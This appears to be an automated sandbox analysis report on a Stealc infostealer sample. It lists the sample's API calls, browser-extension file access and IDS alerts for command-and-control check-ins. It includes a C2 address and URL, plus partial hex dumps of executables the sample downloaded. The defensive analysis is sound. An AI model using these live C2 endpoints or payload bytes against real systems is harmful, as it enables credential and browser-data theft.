Source: C:\Users\user\Desktop\FFAk2gixx5.exe	Code function: 0_2_02FD2457 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,	0_2_02FD2457
Source: C:\Users\user\Desktop\FFAk2gixx5.exe	Code function: 0_2_02FC1827 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_02FC1827
Source: C:\Users\user\Desktop\FFAk2gixx5.exe	Code function: 0_2_02FCD427 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,	0_2_02FCD427
Source: C:\Users\user\Desktop\FFAk2gixx5.exe	Code function: 0_2_02FD1DE7 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,	0_2_02FD1DE7
Source: C:\Users\user\Desktop\FFAk2gixx5.exe	Code function: 0_2_02FCDDC7 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,	0_2_02FCDDC7

Source: C:\Users\user\Desktop\FFAk2gixx5.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\	Jump to behavior
Source: C:\Users\user\Desktop\FFAk2gixx5.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\	Jump to behavior
Source: C:\Users\user\Desktop\FFAk2gixx5.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\	Jump to behavior
Source: C:\Users\user\Desktop\FFAk2gixx5.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\	Jump to behavior
Source: C:\Users\user\Desktop\FFAk2gixx5.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\	Jump to behavior
Source: C:\Users\user\Desktop\FFAk2gixx5.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\	Jump to behavior

Networking

Snort IDS alert for network traffic

Source: Traffic	Snort IDS: 2044243 ET TROJAN [SEKOIA.IO] Win32/Stealc C2 Check-in 192.168.2.6:49706 -> 31.41.44.147:80
Source: Traffic	Snort IDS: 2044244 ET TROJAN Win32/Stealc Requesting browsers Config from C2 192.168.2.6:49707 -> 31.41.44.147:80
Source: Traffic	Snort IDS: 2051828 ET TROJAN Win32/Stealc Active C2 Responding with browsers Config M1 31.41.44.147:80 -> 192.168.2.6:49707
Source: Traffic	Snort IDS: 2044246 ET TROJAN Win32/Stealc Requesting plugins Config from C2 192.168.2.6:49708 -> 31.41.44.147:80
Source: Traffic	Snort IDS: 2051831 ET TROJAN Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M1 31.41.44.147:80 -> 192.168.2.6:49708

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: http://okkolus.com/cf5cbdf706840b3f.php

Downloads executable code via HTTP

Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Mon, 06 May 2024 00:52:44 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 18:30:30 GMTETag: "10e436-5e7f2463c1d80"Accept-Ranges: bytesContent-Length: 1106998Connection: closeContent-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 12 00 d7 dd 15 63 00 92 0e 00 bf 13 00 00 e0 00 06 21 0b 01 02 19 00 26 0b 00 00 16 0d 00 00 0a 00 00 00 14 00 00 00 10 00 00 00 40 0b 00 00 00 e0 61 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 30 0f 00 00 06 00 00 1c 3a 11 00 03 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 d0 0c 00 88 2a 00 00 00 00 0d 00 d0 0c 00 00 00 30 0d 00 a8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 0d 00 18 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 20 0d 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c 02 0d 00 d0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 84 25 0b 00 00 10 00 00 00 26 0b 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 50 60 2e 64 61 74 61 00 00 00 7c 27 00 00 00 40 0b 00 00 28 00 00 00 2c 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 c0 2e 72 64 61 74 61 00 00 70 44 01 00 00 70 0b 00 00 46 01 00 00 54 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 40 2e 62 73 73 00 00 00 00 28 08 00 00 00 c0 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 60 c0 2e 65 64 61 74 61 00 00 88 2a 00 00 00 d0 0c 00 00 2c 00 00 00 9a 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 40 2e 69 64 61 74 61 00 00 d0 0c 00 00 00 00 0d 00 00 0e 00 00 00 c6 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 43 52 54 00 00 00 00 2c 00 00 00 00 10 0d 00 00 02 00 00 00 d4 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 74 6c 73 00 00 00 00 20 00 00 00 00 20 0d 00 00 02 00 00 00 d6 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 73 72 63 00 00 00 a8 04 00 00 00 30 0d 00 00 06 00 00 00 d8 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 65 6c 6f 63 00 00 18 3c 00 00 00 40 0d 00 00 3e 00 00 00 de 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 42 2f 34 00 00 00 00 00 00 38 05 00 00 00 80 0d 00 00 06 00 00 00 1c 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 40 42 2f 31 39 00 00 00 00 00 52 c8 00 00 00 90 0d 00 00 ca 00 00 00 22 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 33 31 00 00 00 00 00 5d 27 00 00 00 60 0e 00 00 28 00 00 00 ec 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 34 35 00 00 00 00 00 9a 2d 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Mon, 06 May 2024 00:52:51 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 14:49:08 GMTETag: "a7550-5e7ef2e90e100"Accept-Ranges: bytesContent-Length: 685392Connection: closeContent-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 0e 08 00 00 34 02 00 00 00 00 00 70 12 08 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 d0 0a 00 00 04 00 00 cb fd 0a 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 48 1c 0a 00 53 00 00 00 9b 1c 0a 00 c8 00 00 00 00 90 0a 00 78 03 00 00 00 00 00 00 00 00 00 00 00 46 0a 00 50 2f 00 00 00 a0 0a 00 f0 23 00 00 94 16 0a 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 20 08 00 a0 00 00 00 00 00 00 00 00 00 00 00 a4 1e 0a 00 40 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 95 0c 08 00 00 10 00 00 00 0e 08 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 c4 06 02 00 00 20 08 00 00 08 02 00 00 12 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 3c 46 00 00 00 30 0a 00 00 02 00 00 00 1a 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 80 0a 00 00 02 00 00 00 1c 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 90 0a 00 00 04 00 00 00 1e 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 f0 23 00 00 00 a0 0a 00 00 24 00 00 00 22 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Mon, 06 May 2024 00:52:54 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 14:49:08 GMTETag: "94750-5e7ef2e90e100"Accept-Ranges: bytesContent-Length: 608080Connection: closeContent-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 a4 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 b6 07 00 00 5e 01 00 00 00 00 00 c0 b9 03 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 80 09 00 00 04 00 00 6a aa 09 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 01 60 08 00 e3 57 00 00 e4 b7 08 00 2c 01 00 00 00 20 09 00 b0 08 00 00 00 00 00 00 00 00 00 00 00 18 09 00 50 2f 00 00 00 30 09 00 d8 41 00 00 14 53 08 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 bc f8 07 00 18 00 00 00 68 d0 07 00 a0 00 00 00 00 00 00 00 00 00 00 00 ec bc 08 00 dc 03 00 00 e4 5a 08 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 61 b5 07 00 00 10 00 00 00 b6 07 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 94 09 01 00 00 d0 07 00 00 0a 01 00 00 ba 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 1d 00 00 00 e0 08 00 00 04 00 00 00 c4 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 00 09 00 00 02 00 00 00 c8 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 74 6c 73 00 00 00 00 15 00 00 00 00 10 09 00 00 02 00 00 00 ca 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 b0 08 00 00 00 20 09 00 00 0a 00 00 00 cc 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 d8 41 00 00 00 30 09 00 00 42 00 00 00 d6 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Mon, 06 May 2024 00:52:56 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 14:49:08 GMTETag: "6dde8-5e7ef2e90e100"Accept-Ranges: bytesContent-Length: 450024Connection: closeContent-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d9 93 31 43 9d f2 5f 10 9d f2 5f 10 9d f2 5f 10 29 6e b0 10 9f f2 5f 10 94 8a cc 10 8b f2 5f 10 9d f2 5e 10 22 f2 5f 10 cf 9a 5e 11 9e f2 5f 10 cf 9a 5c 11 95 f2 5f 10 cf 9a 5b 11 d3 f2 5f 10 cf 9a 5a 11 d1 f2 5f 10 cf 9a 5f 11 9c f2 5f 10 cf 9a a0 10 9c f2 5f 10 cf 9a 5d 11 9c f2 5f 10 52 69 63 68 9d f2 5f 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 82 ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 28 06 00 00 82 00 00 00 00 00 00 60 d9 03 00 00 10 00 00 00 40 06 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 f0 06 00 00 04 00 00 2c e0 06 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 10 67 04 00 82 cf 01 00 e8 72 06 00 18 01 00 00 00 a0 06 00 f0 03 00 00 00 00 00 00 00 00 00 00 00 9c 06 00 e8 41 00 00 00 b0 06 00 ac 3d 00 00 60 78 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 77 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 70 06 00 e4 02 00 00 c0 63 04 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 92 26 06 00 00 10 00 00 00 28 06 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 48 29 00 00 00 40 06 00 00 18 00 00 00 2c 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 ac 13 00 00 00 70 06 00 00 14 00 00 00 44 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 69 64 61 74 00 00 34 00 00 00 00 90 06 00 00 02 00 00 00 58 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 f0 03 00 00 00 a0 06 00 00 04 00 00 00 5a 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 ac 3d 00 00 00 b0 06 00 00 3e 00 00 00 5e 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Mon, 06 May 2024 00:52:59 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 14:49:08 GMTETag: "1f3950-5e7ef2e90e100"Accept-Ranges: bytesContent-Length: 2046288Connection: closeContent-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 d0 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 d8 19 00 00 2e 05 00 00 00 00 00 60 a3 14 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 70 1f 00 00 04 00 00 6c 2d 20 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e4 26 1d 00 fa 9d 00 00 de c4 1d 00 40 01 00 00 00 50 1e 00 78 03 00 00 00 00 00 00 00 00 00 00 00 0a 1f 00 50 2f 00 00 00 60 1e 00 5c 08 01 00 b0 01 1d 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 f0 19 00 a0 00 00 00 00 00 00 00 00 00 00 00 7c ca 1d 00 5c 04 00 00 80 26 1d 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 89 d7 19 00 00 10 00 00 00 d8 19 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 6c ef 03 00 00 f0 19 00 00 f0 03 00 00 dc 19 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 52 00 00 00 e0 1d 00 00 2e 00 00 00 cc 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 40 1e 00 00 02 00 00 00 fa 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 50 1e 00 00 04 00 00 00 fc 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 5c 08 01 00 00 60 1e 00 00 0a 01 00 00 00 1e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Mon, 06 May 2024 00:53:34 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 14:49:08 GMTETag: "3ef50-5e7ef2e90e100"Accept-Ranges: bytesContent-Length: 257872Connection: closeContent-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 cc 02 00 00 f0 00 00 00 00 00 00 50 cf 02 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 00 04 00 00 04 00 00 53 67 04 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 44 76 03 00 53 01 00 00 97 77 03 00 f0 00 00 00 00 b0 03 00 80 03 00 00 00 00 00 00 00 00 00 00 00 c0 03 00 50 2f 00 00 00 c0 03 00 c8 35 00 00 38 71 03 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 e0 02 00 a0 00 00 00 00 00 00 00 00 00 00 00 14 7b 03 00 8c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 26 cb 02 00 00 10 00 00 00 cc 02 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 d4 ab 00 00 00 e0 02 00 00 ac 00 00 00 d0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 98 0b 00 00 00 90 03 00 00 08 00 00 00 7c 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 a0 03 00 00 02 00 00 00 84 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 80 03 00 00 00 b0 03 00 00 04 00 00 00 86 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 c8 35 00 00 00 c0 03 00 00 36 00 00 00 8a 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Mon, 06 May 2024 00:53:36 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 14:49:08 GMTETag: "13bf0-5e7ef2e90e100"Accept-Ranges: bytesContent-Length: 80880Connection: closeContent-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 c5 e4 d5 84 a4 8a 86 84 a4 8a 86 84 a4 8a 86 30 38 65 86 86 a4 8a 86 8d dc 19 86 8f a4 8a 86 84 a4 8b 86 ac a4 8a 86 d6 cc 89 87 97 a4 8a 86 d6 cc 8e 87 90 a4 8a 86 d6 cc 8f 87 9f a4 8a 86 d6 cc 8a 87 85 a4 8a 86 d6 cc 75 86 85 a4 8a 86 d6 cc 88 87 85 a4 8a 86 52 69 63 68 84 a4 8a 86 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 7c ea 30 5d 00 00 00 00 